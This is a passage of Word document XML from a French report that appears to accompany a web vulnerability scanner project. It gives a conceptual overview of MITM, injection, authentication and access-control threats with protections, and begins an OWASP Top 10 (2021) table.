              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">   • 280 jours : délai moyen pour identifier et contenir une violation de données</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="678F71D0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve">   • 6 000 Md$ : coût annuel estimé de la cybercriminalité mondiale d'ici 2025 (Cybersecurity Ventures)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0AE7286F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="006A6D93">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6106E571"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1.2  Panorama des Cybermenaces Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="609D05F4" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Pour bien comprendre les vulnérabilités que notre scanner cherche à détecter, il est essentiel de dresser un panorama complet des menaces qui pèsent sur les applications web modernes. Ces menaces se classent en plusieurs catégories selon leur mécanisme d'exploitation et leur impact.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FA3CAF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.2.1  Attaques Man-in-the-Middle (MITM)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F6AD49" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Les attaques Man-in-the-Middle (MITM, littéralement « l'homme du milieu ») constituent une menace fondamentale pour la confidentialité des communications web. Dans ce type d'attaque, un acteur malveillant s'interpose entre le client et le serveur pour intercepter, lire ou modifier les données en transit, à l'insu des deux parties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1662ADB4" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Mécanismes d'attaque MITM les plus courants :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62AE973F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>ARP Spoofing : empoisonnement du cache ARP pour rediriger le trafic réseau local vers la machine de l'attaquant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EED4951" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>DNS Spoofing : falsification des réponses DNS pour rediriger les utilisateurs vers des serveurs malveillants.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502284D0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>SSL Stripping : dégradation forcée d'une connexion HTTPS vers HTTP pour intercepter les données en clair.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574DF7FA" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Rogue Access Point : création d'un faux point d'accès Wi-Fi pour capturer tout le trafic des victimes connectées.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652F188C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="283"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>BGP Hijacking : détournement de routes BGP pour rediriger le trafic à l'échelle d'Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACD8DD2" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Les protections contre les MITM incluent l'utilisation exclusive de HTTPS avec des certificats valides, l'activation de HSTS (HTTP Strict Transport Security) avec preloading, l'épinglage de certificats (Certificate Pinning) pour les applications mobiles, et la mise en place de l'authentification mutuelle (mTLS) pour les API critiques. Notre scanner détecte les failles cryptographiques (OWASP A02) liées à l'absence de HTTPS, aux cookies non sécurisés et aux formulaires de login servis en HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC69EC3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Tableau — Types d'attaques MITM et protections associées</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1981"/>
        <w:gridCol w:w="2548"/>
        <w:gridCol w:w="4809"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A6D93" w14:paraId="33A29651" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="50C560C7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Type MITM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F1E8623" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Vecteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="110CD05F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="16DB2B15" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F6D780A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ARP Spoofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25A316F0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Réseau local (LAN)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CB3C00A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ARP dynamique sécurisé, VLAN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="5057DD58" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="71108A62" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SSL Stripping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="2299D5ED" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>HTTP non sécurisé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="02B0B68C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>HSTS + preloading</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="7008B01A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55D3538F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DNS Spoofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27397695" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Résolution de noms</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6286FF9A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>DNSSEC, DNS over HTTPS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="31D30A09" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="1858CAA3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Rogue AP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="216285FD" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Wi-Fi public</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="5BBB0C48" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>WPA3, VPN, 802.1X</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="1227A27B" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0834D9FC" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>BGP Hijacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6E9B3C6F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Infrastructure Internet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4819" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="546A6EC0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>RPKI, BGPsec</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1590FD49" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="006A6D93"/>
    <w:p w14:paraId="7651A0A0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.2.2  Attaques par Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348C026D" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Les attaques par injection représentent la menace la plus persistante et la plus documentée dans l'histoire de la sécurité web. Elles exploitent le fait qu'une application traite des données non fiables comme des instructions exécutables. Ce principe s'applique à de nombreux contextes : SQL, HTML/JavaScript, XML, commandes OS, LDAP, XPath, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A45E370" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1.2.3  Attaques sur l'Authentification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663349B4" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Les failles d'authentification et de gestion de session permettent aux attaquants d'usurper l'identité d'utilisateurs légitimes. Les techniques incluent le brute force, l'utilisation de credentials par défaut, le vol de tokens de session, et le contournement de mécanismes d'authentification via des logiques applicatives défectueuses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589F6EB5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="505050"/>
          <w:sz w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1.2.4  Attaques sur le Contrôle d'Accès</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7766FA4E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Les vulnérabilités de contrôle d'accès (OWASP A01 — la catégorie la plus fréquente en 2021) permettent à un utilisateur d'accéder à des ressources ou d'effectuer des actions qui ne lui sont pas autorisées. L'IDOR (Insecure Direct Object Reference) en est l'exemple le plus classique : un utilisateur change l'ID dans l'URL pour accéder au profil d'un autre utilisateur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449D7966"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1.3  Le Référentiel OWASP Top 10 (2021)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684709A8" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>L'OWASP (Open Web Application Security Project) est une fondation à but non lucratif fondée en 2001, dont la mission est d'améliorer la sécurité des logiciels. Elle réunit une communauté mondiale de plus de 250 000 membres, chercheurs et praticiens de la sécurité. Sa publication phare, l'OWASP Top 10, est mise à jour tous les 3 à 4 ans et représente le consensus de la communauté sur les dix risques les plus critiques pour les applications web. Elle est devenue une référence incontournable adoptée par les réglementations (PCI DSS, ISO 27001, NIST) et les programmes de formation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084A5670" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>L'édition 2021 a introduit trois nouvelles catégories (A04 Insecure Design, A08 Software &amp; Data Integrity, A10 SSRF) et reorganisé plusieurs catégories existantes suite à l'analyse de données provenant de plus de 500 000 applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E2C973" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Tableau — OWASP Top 10 — Édition 2021 avec prévalence et description</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="849"/>
        <w:gridCol w:w="2548"/>
        <w:gridCol w:w="1134"/>
        <w:gridCol w:w="4807"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A6D93" w14:paraId="420276CD" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="850" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6557148C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="58BC1B8B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Catégorie</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
